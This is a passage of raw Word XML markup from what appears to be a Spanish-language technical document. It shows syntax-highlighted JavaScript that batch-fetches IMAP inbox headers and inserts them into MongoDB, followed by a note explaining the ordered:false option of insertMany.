          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'INBOX'</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batchSize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UIDs por batch</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> uids </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> imapClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">all</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uids</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> batchSize) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> batch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> uids</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">slice</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batchSize)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fetchResult </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> imapClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(batch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uid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flags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internalDate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size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envelope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'references'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'in-reply-to'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'message-id'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'x-gm-thrid'</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docs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ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fetchResult) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        docs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          accountId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">messageId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">envelope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">messageId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">subject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">envelope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">subject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">envelope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">envelope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">internalDate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">references</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'references'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">split</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\s+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialString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inReplyTo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'in-reply-to'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">gmailThreadId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'x-gm-thrid'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mailbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'INBOX'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">syncedAt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Insert batch en MongoDB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> EmailHeader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">insertMany</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(docs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ordered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finally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">release</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El parámetro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ordered: false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">insertMany</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">permite que un batch continúe insertando incluso si documentos individuales fallan (por ejemplo, por duplicación de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
